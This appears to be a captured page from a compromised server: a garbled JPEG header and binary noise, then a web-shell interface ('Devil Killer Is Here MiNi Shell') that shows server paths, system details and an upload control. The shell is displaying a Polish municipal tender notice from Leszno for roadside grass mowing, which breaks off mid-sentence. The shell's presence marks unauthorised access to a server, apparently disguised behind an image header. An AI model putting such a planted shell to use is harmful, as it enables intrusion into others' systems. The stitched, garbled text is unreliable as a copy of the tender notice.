JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250305/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250305/0013254601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Koszenie traw i chwastów w pasach drogowych dróg powiatowych i gminnych na terenie miasta Leszna </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Leszno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050445</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kazimierza Karasia 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leszno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inf-mzd@leszno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.leszno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Koszenie traw i chwastów w pasach drogowych dróg powiatowych i gminnych na terenie miasta Leszna </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8272be4e-bafd-4ba0-bb6a-852819fef246</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00132546</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00026037/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.18 &#34;Koszenie traw i chwastów w pasach drogowych dróg powiatowych i gminnych na terenie miasta Leszna.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/um_leszno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/um_leszno</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Niezbędne wymagania sprzętowo aplikacyjne umożliwiające pracę na platformazakupowa.pl : stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub<br/>jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje; zainstalowana dowolna przeglądarka internetowa poza przeglądarką Internet Explorer; włączona obsługa JavaScript; zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf; szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3; oznaczenie czasu odbioru<br/>danych przez Platformę stanowi datę i dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Gł. Urzędu Miar. 2. Wykonawca, przystępując do postępowania o udzielenie zamówienia: akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie dostępnym na ww. stronie w zakładce „Regulamin&#34; i uznaje<br/>go za wiążący; zapoznaje i stosuje się do Instrukcji składania ofert dostępnej na platformazakupowa.pl. 3. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, zwłaszcza za zapoznanie się z treścią oferty przed upływem terminu składania ofert, w wyniku np. złożenia oferty przez „Wyślij wiadomość do zamawiającego”. Taka oferta zostanie uznana za ofertę handlową. Nie będzie brana pod uwagę w postępowaniu. 4. Wszelkie<br/>instrukcje korzystania z platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje. 5. Zalecenia: 1) formaty plików wykorzystywanych przez Wykonawców winny być<br/>zgodne z Rozporządzeniem Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (…), dalej „Rozporządzenie KRI”. 2) rekomenduje się wykorzystanie formatów: .pdf .doc . docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf 3) W celu kompresji danych rekomenduje się wykorzystanie jednego z formatów: a).zip, b).7Z. 4) Wśród formatów powszechnych a niewystępujących w „Rozporządzeniu KRI” występują: .rar .gif .bmp .numbers .pages. Pliki te zostaną uznane za złożone nieskutecznie. 5) zwraca się uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB i na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp- do składania podpisu osobistego, który wynosi max 5MB. 6) W przypadku użycia kwalifikowanego podpisu elektronicznego:-ze względu na niskie ryzyko naruszenia integralności pliku i łatwiejszą weryfikację podpisu, zaleca się w miarę możliwości przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym w formacie PAdES. -pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca winien pamiętać aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.- rekomenduje się wykorzystanie podpisu z kwalifikowanym znacznikiem czasu. 7) zaleca się aby w przypadku podpisywania pliku przez kilka osób stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów może doprowadzić do problemów w weryfikacji plików. 8) zaleca się aby Wykonawca z odpowiednim wyprzedzeniem przetestował wybraną metodę podpisania plików oferty. 9)Ofertę należy przygotować z należytą starannością, zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert. Zaleca się złożenie oferty na 24 h przed terminem składania ofert. 10) zaleca się stosowanie algorytmu SHA2 przy podpisywaniu plików. 11) Jeśli Wykonawca kompresuje pliki np.zip zaleca się wcześniejsze podpisanie każdego z plików. 12) zaleca się aby nie wprowadzać zmian w plikach po podpisaniu podpisem kwalifikowanym. Może to naruszyć integralność plików, doprowadzić do odrzucenia oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Urząd Miasta Leszna, reprezentowany przez Prezydenta Miasta Leszna, ul. Kazimierza Karasia 15, 64-100 Leszno. Może się Pani/Pan kontaktować z nim listownie na adres: ul. Kazimierza Karasia 15, 64-100 Leszno, telefonicznie dzwoniąc pod numer 65 529 81 00 lub przez elektroniczną skrzynkę podawczą na stronie um@leszno.pl<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym można kontaktować się pod adresem e-mail: iod@leszno.pl;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podst.: - ustawy z dn. 11 września 2019 r. - Prawo zamówień publicznych, i aktów wykonawczych do niej; - ustawy z dn. 6 września 2001 r. o dost. do inf. publicznej; - ustawy z dn. 27 sierpnia 2009 r. o finansach publicznych; - ustawy z dn. 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach, co wypełnia legalność przesłanek przetwarzania danych opisaną w art. 6 ust. 1 lit. b oraz c RODO.<br/>4)	Pani/Pana dane osobowe będą przetwarzane w celu prowadzenia postępowania - znak sprawy: INF-MZD.271.01.2025, prowadzonym w trybie podst. na podstawie art. 275 pkt 2) ustawy Pzp oraz jego rozstrzygnięcia i zawarcia umowy oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji. <br/>5)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp oraz OPEN NEXUS Sp. z o.o., który przetwarza dane osobowe w imieniu administratora danych jako właściciel Platformy Zakupowej, na której UML prowadzi postępowania o udzielenie zamówienia publicznego. <br/>6)	Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej;<br/>7)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>8)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dot. jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>9) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>10) Posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO, o której mowa w art. 77 RODO.<br/>11) Nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje o ograniczeniach stosowania przepisów RODO, o których mowa w art. 19 ust 2 i 3 ustawy Pzp. 1. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. 2. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">INF-MZD.271.01.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest koszenie traw i chwastów w pasach drogowych dróg powiatowych i gminnych na terenie miasta Leszna wraz z wywiezieniem i utylizacją powstałych przy wykaszaniu odpadów.<br/>2. Część I – obejmuje Rejon A (Antoniny, Gronowo, Grzybowo).<br/>3. UWAGA! Dla każdego zadania wskazanego powyżej wymagane jest posiadanie osobnego sprzętu w ilości niezbędnej do właściwej realizacji zadania dla danej części przedmiotu zamówienia. Zamawiający wymaga równoczesnego wykonywania zamówienia na poszczególnych zadaniach.<br/>4. Szczegółowy zakres przedmiotu zamówienia został wskazany w Załączniku nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Najkorzystniejszą ofertą, będzie oferta, która przedstawia najkorzystniejszy bilans kryteriów oceny ofert, odnoszących się do przedmiotu zamówienia.<br/>2. Zamawiający dla każdej części przedmiotu zamówienia dokona wyboru oferty najkorzystniejszej w oparciu o następujące kryteria oceny ofert: <br/>1) Najniższa cena ofertowa brutto (Pc) – waga kryterium to 60 pkt.<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Maksymalną liczbę punktów otrzyma oferta z najniższą ceną ofertową (60 pkt). Pozostałe oferty zostaną ocenione wg następującego wzoru:<br/>Pc = (Cn/Cb) x 60 [pkt]<br/>gdzie:<br/> Pc	– oznacza punkty w kryterium „Najniższa cena ofertowa brutto”<br/> Cn	– oznacza najniższą oferowaną cenę brutto spośród ofert niepodlegających odrzuceniu<br/> Cb	– oznacza cenę brutto badanej oferty.<br/>2) Skrócenie czasu rozpoczęcia koszeń (Pcz) – waga kryterium 40 pkt.<br/>W przedmiotowym kryterium ocenie podlegać będzie skrócenie przystąpienia do koszenia w stosunku do terminu określonego przez Zamawiajacego w Rozdziale IV ust. 3 SWZ, tj. skrócenie o wskazaną liczbę dni roboczych, licząc od dnia zlecenia Zamawiającego do przystąpienia do wykonania koszenia.<br/>W ramach niniejszego kryterium punkty zostaną przyznane w następujący sposób:<br/>	0 pkt -	skrócenie czasu rozpoczęcia koszenia o 1 dzień roboczy (tj. rozpoczęcie koszenia 4 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	20 pkt - skrócenie czasu rozpoczęcia koszenia o 2 dni robocze (tj. rozpoczęcie koszenia 3 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	40 pkt - skrócenie czasu rozpoczęcia koszenia o 3 dni robocze (tj. rozpoczęcie koszenia 2 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>a)	Ocena w ramach przedmiotowego kryterium zostanie dokonana w oparciu o informacje podane przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Wykonawca winien zaznaczyć w Formularzu ofertowym jedną z wyżej wymienionych możliwości. <br/>b)	W przypadku jeżeli Wykonawca nie zaznaczy żadnego z powyższych, Zamawiający przyjmie zgodnie z Rozdziałem IV SWZ – 5 dniowy termin rozpoczęcia świadczenia usługi, liczony od daty pisemnego zlecenia wykonania koszenia, przyznając Wykonawcy w przedmiotowym kryterium 0 punktów.<br/>UWAGA!<br/>Zadeklarowany w Formularzu ofertowym czas rozpoczęcia koszenia będzie wiążący na etapie realizacji umowy. Nie wywiązanie się Wykonawcy z zadeklarowanego, skróconego terminu rozpoczęcia koszenia będzie podlegało naliczeniu kary umownej, o której mowa w projekcie umowy wg Załącznika nr 6 do SWZ.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, którego oferta uzyska największą ilość punktów (P) obliczonych zgodnie z powyższymi zasadami wg wzoru: P = Pc + Pcz, i odpowiada wszystkim wymaganiom przedstawionym w ustawie – Prawo zamówień publicznych oraz niniejszej SWZ.<br/>4. Na podstawie powyższych kryteriów zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa suma punktów uzyskanych w poszczególnych kryteriach wyznaczy najkorzystniejszą ofertę.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w niniejszej SWZ <br/>i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>6. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie czasu rozpoczęcia koszeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest koszenie traw i chwastów w pasach drogowych dróg powiatowych i gminnych na terenie miasta Leszna wraz z wywiezieniem i utylizacją powstałych przy wykaszaniu odpadów.<br/>2. Część II – obejmuje Rejon B (Śródmieście, Nowe Miasto, Podwale).<br/>3. UWAGA! Dla każdego zadania wskazanego powyżej wymagane jest posiadanie osobnego sprzętu w ilości niezbędnej do właściwej realizacji zadania dla danej części przedmiotu zamówienia. Zamawiający wymaga równoczesnego wykonywania zamówienia na poszczególnych zadaniach.<br/>4. Szczegółowy zakres przedmiotu zamówienia został wskazany w Załączniku nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Najkorzystniejszą ofertą, będzie oferta, która przedstawia najkorzystniejszy bilans kryteriów oceny ofert, odnoszących się do przedmiotu zamówienia.<br/>2. Zamawiający dla każdej części przedmiotu zamówienia dokona wyboru oferty najkorzystniejszej w oparciu o następujące kryteria oceny ofert: <br/>1) Najniższa cena ofertowa brutto (Pc) – waga kryterium to 60 pkt.<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Maksymalną liczbę punktów otrzyma oferta z najniższą ceną ofertową (60 pkt). Pozostałe oferty zostaną ocenione wg następującego wzoru:<br/>Pc = (Cn/Cb) x 60 [pkt]<br/>gdzie:<br/> Pc	– oznacza punkty w kryterium „Najniższa cena ofertowa brutto”<br/> Cn	– oznacza najniższą oferowaną cenę brutto spośród ofert niepodlegających odrzuceniu<br/> Cb	– oznacza cenę brutto badanej oferty.<br/>2) Skrócenie czasu rozpoczęcia koszeń (Pcz) – waga kryterium 40 pkt.<br/>W przedmiotowym kryterium ocenie podlegać będzie 